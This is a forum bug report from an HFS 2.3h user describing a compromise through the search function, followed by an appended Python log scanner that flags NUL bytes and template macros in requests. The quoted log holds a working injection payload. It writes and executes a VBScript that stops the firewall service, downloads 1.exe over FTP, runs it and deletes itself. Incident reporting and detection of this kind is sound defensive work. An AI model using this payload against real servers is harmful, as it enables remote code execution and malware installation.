rejetto forum


Messages - apanx

Bug reports / Execution Exploit in search function
« on: June 14, 2016, 09:18:05 PM »
I am running HFS 2.3h and got hacked via the search function in HFS. The hacker was able to create and execute a VBScript, which failed because the file they attempted to download was not found.
See log below. There is a NUL character between ?search== and {.save|6.vbs...
I have disabled HFS at the moment and am waiting for a fix.

Code:
2016-06-13 15:58:52 1740 Requested GET /?search== {.save|6.vbs|a=replace("set*objshell=createobject("""")""%comspec%*/k*cmd*/c*net1*stop*sharedaccess&echo*open*>*cmd.txt&echo*123>>*cmd.txt&echo*123>>*cmd.txt&echo*binary*>>*cmd.txt&echo*get*1.exe*>>*cmd.txt&echo*bye*>>*cmd.txt&ftp*-s:cmd.txt&ftp*-s:cmd.txt&start*1.exe*start*1.exe&del*cmd.txt""),1,true","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
2016-06-13 15:58:52 1740 Served 3.9 K
2016-06-13 15:58:52 1740 Requested GET /?search== {.exec|6.vbs|.}

I have tried just entering the URL requests in my browser with and without the NUL after == and managed to create files in the HFS folder.

A similar exploit has been mentioned before in this forum.
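As an added example (not from the post or the HFS project), the following script scans HFS 2.x request log lines for the two indicators the post describes: a NUL byte in the search query and a `{.name|...}` template macro in the request. The log line format and the sample lines are constructed to mirror the post, with the payload shortened.

```python
import re
from urllib.parse import unquote

# HFS 2.x log lines look like "<date> <time> <id> Requested GET <path>"
LOG_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<id>\d+) Requested (?P<method>[A-Z]+) (?P<path>.*)$")
# HFS template macros have the form {.name|arg|arg.}; one in a client request is abnormal
MACRO_RE = re.compile(r"\{\.\s*(?P<name>[a-zA-Z_]+)[^}]*\.\}")

def flag_request(path):
    """Return the reasons a request path looks like macro injection, [] if clean."""
    decoded = unquote(path)  # handle %00, %7B etc. so encoded variants are caught too
    reasons = []
    if "\x00" in decoded:
        reasons.append("NUL byte in query (filter-bypass attempt)")
    for m in MACRO_RE.finditer(decoded):
        reasons.append(f"template macro {{.{m.group('name')}.}} in request")
    return reasons

def scan_log(lines):
    """Return (timestamp, path, reasons) for every suspicious request line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # "Served ..." and other non-request lines are ignored
        reasons = flag_request(m.group("path"))
        if reasons:
            hits.append((m.group("ts"), m.group("path"), reasons))
    return hits

# Constructed sample lines modelled on the post; "\x00" is the NUL after "=="
SAMPLE_LOG = [
    "2016-06-13 15:58:52 1740 Requested GET /?search==\x00{.save|6.vbs|msgbox 1.}",
    "2016-06-13 15:58:52 1740 Served 3.9 K",
    "2016-06-13 15:58:52 1740 Requested GET /?search==\x00{.exec|6.vbs|.}",
    "2016-06-13 15:59:10 1741 Requested GET /?search=%00%7B.save%7Cx.vbs%7Ca.%7D",
    "2016-06-13 16:00:00 1742 Requested GET /?search=holiday photos",
]

if __name__ == "__main__":
    for ts, path, reasons in scan_log(SAMPLE_LOG):
        print(ts, repr(path), "->", "; ".join(reasons))
```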
